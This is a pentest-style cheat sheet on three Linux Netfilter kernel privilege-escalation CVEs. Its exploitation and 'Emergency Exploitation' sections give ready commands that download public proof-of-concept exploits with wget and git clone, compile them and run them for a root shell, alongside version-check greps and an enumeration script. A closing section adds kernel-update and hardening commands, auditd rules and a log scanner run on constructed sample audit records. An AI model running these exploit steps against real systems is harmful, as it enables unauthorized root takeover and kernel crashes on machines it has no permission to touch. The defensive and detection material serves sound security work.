# Netfilter Kernel Exploits

## 🎯 Overview

Netfilter is the Linux kernel's packet-filtering framework (ip_tables/x_tables, nf_tables and the 32-bit compat layer between them). Memory-safety bugs in it give local privilege escalation because the vulnerable code runs in the kernel, and the setsockopt/netlink interfaces that reach it can be opened by an unprivileged user who first creates a user namespace. The three CVEs below span kernels 2.6 - 6.3.1, each with its own affected range; distribution kernels backport fixes without changing `uname -r`, so a version match is a hint, not proof.

## 🚨 Major Netfilter CVEs

### CVE-2021-22555 (Heap Out-of-Bounds Write)

* **Affected**: Linux kernels 2.6.19 - 5.11 (fixed upstream in 5.12; backported to stable and distro kernels)
* **Impact**: Local privilege escalation via heap corruption
* **Exploit**: The compat (32-bit) `IPT_SO_SET_REPLACE` setsockopt path in x_tables pads match/target structures and writes zero bytes past the end of the heap buffer; reachable by an unprivileged user through a user namespace, only on `CONFIG_COMPAT=y` kernels

### CVE-2022-25636 (Heap Out-of-Bounds Write)

* **Affected**: NVD lists Linux kernels 5.4 - 5.6.10; the upstream fix landed in the 5.17 cycle (February 2022) and was backported to stable, and public exploits were developed against a 5.13 Ubuntu 21.10 kernel, so treat 5.4 - 5.16 builds without the backport as in scope
* **Impact**: Root privileges via heap out-of-bounds write in `nf_dup_netdev.c` (nf_tables flow-offload handling of `dup`/`fwd` actions)
* **Risk**: Heap corruption; a failed attempt can leave the kernel unstable, reboot required

### CVE-2023-32233 (Use-After-Free)

* **Affected**: Linux kernels with nf_tables (3.13 onward) up to 6.3.1; fixed in 6.3.2
* **Impact**: Use-after-free of anonymous sets in nf_tables, giving local root
* **Method**: Once the rule binding an anonymous set is deleted inside a netlink batch, the set is released but can still be looked up and operated on by later operations in the same batch, so the freed object is used; the attacker needs CAP_NET_ADMIN, which an unprivileged user gets by creating a user namespace

## 🔍 Kernel Version Detection

### Check Vulnerable Versions

```bash
# Check current kernel
uname -r

# These greps only look at major.minor(.patch). Distribution kernels backport
# fixes without bumping the version, so a match means "candidate", not
# "vulnerable": confirm via the package changelog or in a test VM.

# CVE-2021-22555 check (2.6.19 - 5.11; fixed upstream in 5.12)
uname -r | grep -qE "^(2\.6\.|[34]\.|5\.[0-9]\.|5\.1[01]\.)" && echo "CVE-2021-22555 candidate"

# CVE-2022-25636 check (NVD: 5.4 - 5.6.10; upstream fix in the 5.17 cycle, so 5.4 - 5.16 without the backport)
uname -r | grep -qE "^5\.([4-9]|1[0-6])\." && echo "CVE-2022-25636 candidate"

# CVE-2023-32233 check (nf_tables kernels 3.13 - 6.3.1; fixed in 6.3.2)
uname -r | grep -qE "^(3\.1[3-9]\.|[45]\.|6\.[0-2]\.|6\.3\.[01]($|[^0-9]))" && echo "CVE-2023-32233 candidate"
```

## 🚀 Exploitation Methods

### CVE-2021-22555 Exploitation

```bash
# Download exploit (Google Security Research PoC)
wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c

# Compile (32-bit static). The bug sits in the compat (32-bit) setsockopt
# path, so the binary must be 32-bit: needs gcc-multilib on the build box
# and CONFIG_COMPAT=y on the target. The PoC also needs unprivileged
# user namespaces to obtain CAP_NET_ADMIN.
gcc -m32 -static exploit.c -o exploit

# Execute for root shell
./exploit
# Result: uid=0(root) gid=0(root) groups=0(root)
```

### CVE-2022-25636 Exploitation

```bash
# Download exploit
git clone https://github.com/Bonfee/CVE-2022-25636.git
cd CVE-2022-25636

# Compile and execute. The exploit hard-codes offsets for the kernel build
# named in its README; on any other build expect a crash, not a shell.
make
./exploit

# ⚠️ WARNING: heap corruption in the nf_tables offload code; a failed
# attempt can leave the kernel unstable until reboot
```

### CVE-2023-32233 Exploitation

```bash
# Download exploit
git clone https://github.com/Liuk3r/CVE-2023-32233.git
cd CVE-2023-32233

# Compile with required libraries (Debian/Ubuntu: apt install libmnl-dev libnftnl-dev)
gcc -Wall -o exploit exploit.c -lmnl -lnftnl

# Execute for root shell. Needs unprivileged user namespaces (CAP_NET_ADMIN
# inside a userns) and a kernel with nf_tables; the ROP chain is built for
# the specific distro kernel named in the README.
./exploit
# Result: uid=0(root) gid=0(root) groups=0(root)
```

## 🔍 Detection & Enumeration

### Netfilter Vulnerability Check

```bash
#!/bin/bash
echo "=== NETFILTER KERNEL EXPLOITS CHECK ==="

kernel=$(uname -r)
echo "Kernel version: $kernel"
echo "    (version match = candidate only; distro kernels backport fixes)"

# CVE-2021-22555 (2.6.19 - 5.11, fixed upstream in 5.12)
if echo "$kernel" | grep -qE "^(2\.6\.|[34]\.|5\.[0-9]\.|5\.1[01]\.)"; then
    echo "[!] CVE-2021-22555 candidate (needs CONFIG_COMPAT=y and a 32-bit build)"
    grep -qs '^CONFIG_COMPAT=y' "/boot/config-$kernel" && echo "    CONFIG_COMPAT=y"
    echo "    Download: https://github.com/google/security-research"
fi

# CVE-2022-25636 (NVD: 5.4 - 5.6.10; upstream fix in the 5.17 cycle, so 5.4 - 5.16 without the backport)
if echo "$kernel" | grep -qE "^5\.([4-9]|1[0-6])\."; then
    echo "[!] CVE-2022-25636 candidate (CAUTION: can corrupt kernel)"
    echo "    Download: https://github.com/Bonfee/CVE-2022-25636"
fi

# CVE-2023-32233 (nf_tables kernels 3.13 - 6.3.1, fixed in 6.3.2)
if echo "$kernel" | grep -qE "^(3\.1[3-9]\.|[45]\.|6\.[0-2]\.|6\.3\.[01]($|[^0-9]))"; then
    echo "[!] CVE-2023-32233 candidate"
    echo "    Download: https://github.com/Liuk3r/CVE-2023-32233"
fi

# All three need CAP_NET_ADMIN, which an unprivileged user gets via a user namespace
echo "[+] Unprivileged user namespaces:"
cat /proc/sys/kernel/unprivileged_userns_clone 2>/dev/null   # Debian/Ubuntu: 1 = allowed
cat /proc/sys/user/max_user_namespaces 2>/dev/null            # upstream: 0 = blocked

echo "[+] Checking build dependencies:"
which gcc 2>/dev/null && echo "GCC available"
dpkg -l 2>/dev/null | grep -E "gcc-multilib|libmnl-dev|libnftnl-dev"   # Debian/Ubuntu
rpm -qa 2>/dev/null | grep -E "libmnl-devel|libnftnl-devel"            # RHEL/Fedora
```

### Netfilter Service Check

```bash
# Netfilter modules present (no module name contains the string "netfilter")
lsmod | grep -E '^(nf_|nft_|x_tables|ip_tables|ip6_tables|nfnetlink)'
iptables -L 2>/dev/null | head -5
systemctl status netfilter-persistent 2>/dev/null
# An active firewall is not a prerequisite: the exploits work from their own
# network namespace, and nf_tables is autoloaded on first nfnetlink use.
```

## 🔑 Quick Reference

### Immediate Checks

```bash
# Kernel vulnerability quick check (major.minor match = candidate; verify against the distro changelog)
uname -r | grep -qE "^(2\.6\.|[34]\.|5\.[0-9]\.|5\.1[01]\.)" && echo "CVE-2021-22555"
uname -r | grep -qE "^5\.([4-9]|1[0-6])\." && echo "CVE-2022-25636"
uname -r | grep -qE "^(3\.1[3-9]\.|[45]\.|6\.[0-2]\.|6\.3\.[01]($|[^0-9]))" && echo "CVE-2023-32233"

# Can an unprivileged user create a user namespace? (all three exploits need it)
unshare -Ur true 2>/dev/null && echo "userns OK" || echo "userns blocked"

# Compilation capability
which gcc
```

### Emergency Exploitation

```bash
# CVE-2021-22555 (most reliable PoC, widest range; needs CONFIG_COMPAT=y and gcc-multilib)
wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
gcc -m32 -static exploit.c -o exploit
./exploit

# CVE-2023-32233 (newer kernels; needs libmnl-dev/libnftnl-dev, offsets match the README's kernel build only)
git clone https://github.com/Liuk3r/CVE-2023-32233.git
cd CVE-2023-32233
gcc -Wall -o exploit exploit.c -lmnl -lnftnl
./exploit
```

## ⚠️ Critical Warnings

### Kernel Exploit Risks

* **System instability** - Can crash the system
* **Kernel corruption** - May require reboot
* **Production danger** - Never run on production systems
* **Testing recommended** - Test in controlled environments

### Exploitation Considerations

* **CVE-2022-25636** - Highest risk of kernel corruption
* **CVE-2021-22555** - Most stable PoC and widest kernel range, but also the one most likely to have been backport-patched
* **CVE-2023-32233** - Newest, targets recent kernels
* **Hard-coded offsets** - Public PoCs are built for one distro kernel build; compare the README's tested version with `uname -r` before running, a mismatch crashes the box
* **Prerequisites** - All three need unprivileged user namespaces (CAP_NET_ADMIN); CVE-2021-22555 also needs `CONFIG_COMPAT=y`
* **Dependencies** - libmnl-dev and libnftnl-dev (CVE-2023-32233), gcc-multilib for the 32-bit build (CVE-2021-22555)

## 🛡️ Defensive Measures

### Kernel Updates

```bash
# Check available kernel updates
apt list --upgradable | grep linux-image
dnf check-update kernel

# Was a fix backported to the running kernel? (the version number alone does not tell)
zgrep -E "CVE-2021-22555|CVE-2022-25636|CVE-2023-32233" /usr/share/doc/linux-image-$(uname -r)/changelog.Debian.gz   # Debian/Ubuntu
rpm -q --changelog kernel-core-$(uname -r) | grep -E "CVE-2021-22555|CVE-2022-25636|CVE-2023-32233"               # RHEL/Fedora (kernel-... on RHEL 7)

# Update kernel (requires reboot)
sudo apt update && sudo apt upgrade linux-image-generic
```

### Netfilter Hardening

```bash
# All three exploits need CAP_NET_ADMIN, which an unprivileged user only gets by
# creating a user namespace; turning that off closes the door (rootless containers too)
sysctl -w kernel.unprivileged_userns_clone=0      # Debian/Ubuntu kernels
sysctl -w user.max_user_namespaces=0              # upstream knob; blocks all new user namespaces, root included
# Keep nf_tables from autoloading where the host does not use nftables (CVE-2022-25636, CVE-2023-32233 paths)
echo 'install nf_tables /bin/false' > /etc/modprobe.d/blacklist-nf_tables.conf
# KASLR is on by default, so only check for "nokaslr"; CONFIG_COMPAT (CVE-2021-22555)
# is build-time only. Use grsecurity/PaX where available; audit userns creation.
grep -qw nokaslr /proc/cmdline && echo "[!] KASLR disabled on the kernel cmdline"
```
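The hardening list mentions monitoring without saying what to watch. As an added example of mine, not from these notes (the rules are a suggestion, not something the page's exploits were observed with): when run by an unprivileged user, each PoC first calls unshare/clone with CLONE_NEWUSER to obtain CAP_NET_ADMIN, and the CVE-2021-22555 PoC is a 32-bit binary issuing setsockopt(IPT_SO_SET_REPLACE), either as the direct i386 syscall or through socketcall. The audit rules catch those shapes and the scanner reduces the resulting records to alerts. The rule keys `userns` and `ipt_compat` and every log line below are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the original notes): auditd rules plus a small log
# scanner for the syscall patterns these exploits produce when run unprivileged.

# CLONE_NEWUSER = 0x10000000 in a0 of unshare(2)/clone(2) by a real login user
# (auid >= 1000; 4294967295 = unset). IPT_SO_SET_REPLACE = 64 = 0x40 as optname
# (a2) of the i386 setsockopt syscall; older 32-bit glibc goes through socketcall
# with a0 = 14 (SYS_SETSOCKOPT), where the optname sits behind a pointer and
# cannot be filtered, so that rule is noisier.
AUDIT_RULES='-a always,exit -F arch=b64 -S unshare -S clone -F a0&0x10000000 -F auid>=1000 -F auid!=4294967295 -k userns
-a always,exit -F arch=b32 -S unshare -S clone -F a0&0x10000000 -F auid>=1000 -F auid!=4294967295 -k userns
-a always,exit -F arch=b32 -S setsockopt -F a2=0x40 -F auid>=1000 -F auid!=4294967295 -k ipt_compat
-a always,exit -F arch=b32 -S socketcall -F a0=14 -F auid>=1000 -F auid!=4294967295 -k ipt_compat'

# install_audit_rules PATH -> writes the rules; on a real host use
# /etc/audit/rules.d/netfilter.rules and then `augenrules --load`
install_audit_rules() {
    printf '%s\n' "$AUDIT_RULES" > "$1"
}

# audit_alerts LOGFILE -> one "ALERT ..." line per SYSCALL record that carries
# one of our keys and comes from a login user (auid >= 1000)
audit_alerts() {
    awk '
    /^type=SYSCALL/ {
        key = ""; auid = ""; comm = ""; exe = ""; ok = ""
        for (i = 1; i <= NF; i++) {
            n = index($i, "=")
            if (n == 0) continue
            name = substr($i, 1, n - 1); val = substr($i, n + 1)
            gsub(/"/, "", val)
            if (name == "key")     key  = val
            if (name == "auid")    auid = val
            if (name == "comm")    comm = val
            if (name == "exe")     exe  = val
            if (name == "success") ok   = val
        }
        if ((key == "userns" || key == "ipt_compat") && auid != "4294967295" && auid + 0 >= 1000)
            printf "ALERT %s auid=%s comm=%s exe=%s success=%s\n", key, auid, comm, exe, ok
    }' "$1"
}

# Constructed sample of what auditd writes once the rules are loaded:
#  1. exploit creating a user namespace (x86_64 unshare = syscall 272, a0 = CLONE_NEWUSER)
#  2. the PROCTITLE record of the same event (ignored by the scanner)
#  3. the 32-bit exploit doing socketcall(SYS_SETSOCKOPT) (i386 syscall 102, a0 = 0xe)
#  4. a browser sandbox creating a user namespace: a legitimate hit that needs baselining
#  5. a record from some other rule key, which must not be reported
SAMPLE_LOG='type=SYSCALL msg=audit(1700000000.101:501): arch=c000003e syscall=272 success=yes exit=0 a0=10000000 a1=0 a2=0 a3=0 items=0 ppid=2210 pid=2300 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="exploit" exe="/tmp/exploit" key="userns"
type=PROCTITLE msg=audit(1700000000.101:501): proctitle="./exploit"
type=SYSCALL msg=audit(1700000000.109:502): arch=40000003 syscall=102 success=yes exit=0 a0=e a1=ffa2c0a0 a2=0 a3=0 items=0 ppid=2210 pid=2300 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="exploit" exe="/tmp/exploit" key="ipt_compat"
type=SYSCALL msg=audit(1700000000.300:503): arch=c000003e syscall=272 success=yes exit=0 a0=10000000 a1=0 a2=0 a3=0 items=0 ppid=1800 pid=1900 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=3 comm="chrome" exe="/opt/google/chrome/chrome" key="userns"
type=SYSCALL msg=audit(1700000000.400:504): arch=c000003e syscall=59 success=yes exit=0 a0=55d1c0 a1=55d2a0 a2=55d3f0 a3=0 items=2 ppid=2210 pid=2400 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="sudo" exe="/usr/bin/sudo" key="privileged"'

# demo -> runs the scanner over the constructed sample
demo() {
    _tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_LOG" > "$_tmp"
    audit_alerts "$_tmp"
    rm -f "$_tmp"
}

demo
```

On desktops the `userns` key fires for Chrome/Chromium, Firefox, flatpak and rootless podman, so it needs a baseline there; on servers an unprivileged user creating a user namespace is rare enough to page on. The socketcall rule matches any 32-bit program setting a socket option, which on a 64-bit server fleet is itself unusual. Pair either alert with the `success=` field: a successful `userns` record followed by a kernel oops in `dmesg` is the failed-exploit signature the "Critical Warnings" section describes.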

***

*Netfilter kernel exploits target the network filtering subsystem - these kernel-level vulnerabilities provide direct root access but carry significant system stability risks and should be used with extreme caution.*

